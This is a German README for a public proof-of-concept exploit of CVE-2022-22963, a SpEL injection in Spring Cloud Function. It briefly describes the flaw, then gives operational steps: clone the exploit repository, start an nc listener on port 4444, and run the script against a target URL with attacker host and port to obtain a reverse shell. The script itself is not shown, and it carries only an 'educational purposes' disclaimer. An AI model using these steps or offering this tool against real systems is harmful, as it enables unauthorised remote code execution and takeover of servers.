
Proof-of-Concept-Exploit für CVE-2022-22963, eine SpEL-Injection in Spring Cloud Function, die zu Remote-Code-Ausführung führt. Enthält ein Shell-Skript für die automatisierte Ausnutzung mit Reverse-Shell-Payload.
In den Versionen 3.1.6, 3.2.2 und früheren Versionen von Spring Cloud Function ist es bei Verwendung der Routing-Funktionalität einem Benutzer möglich, ein speziell gestaltetes SpEL als Routing-Ausdruck bereitzustellen, das zur Remote-Codeausführung und zum Zugriff auf lokale Ressourcen führen kann.
Klone das Repository
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
Wechsle in den Ordner
cd CVE-2022-22963
Ändere die Ausführungsberechtigungen
chmode +x springCloud.sh
Starte nc auf dem gewünschten Port
nc -nlvp 4444
Führe den folgenden Befehl aus und passe die Parameter entsprechend deinen Anforderungen an
./springCloud.sh url lhost lport
HINWEIS: Die Nutzung dieses Repositoriums liegt in der Verantwortung des Nutzers und nicht des Autors; es dient nur zu Bildungszwecken.